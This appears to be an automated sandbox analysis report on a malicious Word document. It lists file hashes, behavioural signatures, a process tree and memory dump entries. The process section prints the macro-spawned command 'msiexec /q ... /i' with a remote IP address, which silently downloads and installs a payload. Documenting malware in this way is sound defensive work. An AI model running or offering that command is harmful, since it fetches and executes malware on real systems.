Analysis

  • max time kernel
    111s
  • max time network
    132s
  • platform
    windows10_x64
  • resource
    win10-en-20211208
  • submitted
    28-01-2022 22:24

General

  • Target

    0fe745b26efe3c4d82389d10c43e5755a30e1a794d920a807915313f049048eb.doc

  • Size

    98KB

  • MD5

    477e6a9efebdbf54f09d06ef8a29da79

  • SHA1

    bc219e56929889acdf80cf692cd6b0d7a43b8207

  • SHA256

    0fe745b26efe3c4d82389d10c43e5755a30e1a794d920a807915313f049048eb

  • SHA512

    e209d8fa97c11208bd570035ba90469f9dce9ef1a6916f97ec5932aa836313ef838fb9ab65c87abde7dcc34948354a951a2a3937aa4f13945e24b6081ba7d6c2

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 1 IoCs
  • Use of msiexec (install) with remote resource 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 32 IoCs
  • Suspicious use of SetWindowsHookEx 8 IoCs
  • Suspicious use of WriteProcessMemory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\0fe745b26efe3c4d82389d10c43e5755a30e1a794d920a807915313f049048eb.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2328
    • C:\Windows\SYSTEM32\msiexec.exe
      msiexec /q step1=commonl step2=files /i http://185.140.248.17/ltm1
      2⤵
      • Process spawned unexpected child process
      • Use of msiexec (install) with remote resource
      • Suspicious use of AdjustPrivilegeToken
      PID:1976
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Blocklisted process makes network request
    • Suspicious use of AdjustPrivilegeToken
    PID:3660

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2328-115-0x00007FFE3E940000-0x00007FFE3E950000-memory.dmp
    Filesize

    64KB

  • memory/2328-116-0x00007FFE3E940000-0x00007FFE3E950000-memory.dmp
    Filesize

    64KB

  • memory/2328-117-0x00007FFE3E940000-0x00007FFE3E950000-memory.dmp
    Filesize

    64KB

  • memory/2328-118-0x00007FFE3E940000-0x00007FFE3E950000-memory.dmp
    Filesize

    64KB

  • memory/2328-119-0x00007FFE3E940000-0x00007FFE3E950000-memory.dmp
    Filesize

    64KB

  • memory/2328-122-0x00007FFE3ADD0000-0x00007FFE3ADE0000-memory.dmp
    Filesize

    64KB

  • memory/2328-123-0x00007FFE3ADD0000-0x00007FFE3ADE0000-memory.dmp
    Filesize

    64KB

  • memory/2328-265-0x0000022B88C90000-0x0000022B88C94000-memory.dmp
    Filesize

    16KB

  • memory/2328-344-0x00007FFE3E940000-0x00007FFE3E950000-memory.dmp
    Filesize

    64KB

  • memory/2328-345-0x00007FFE3E940000-0x00007FFE3E950000-memory.dmp
    Filesize

    64KB

  • memory/2328-346-0x00007FFE3E940000-0x00007FFE3E950000-memory.dmp
    Filesize

    64KB

  • memory/2328-347-0x00007FFE3E940000-0x00007FFE3E950000-memory.dmp
    Filesize

    64KB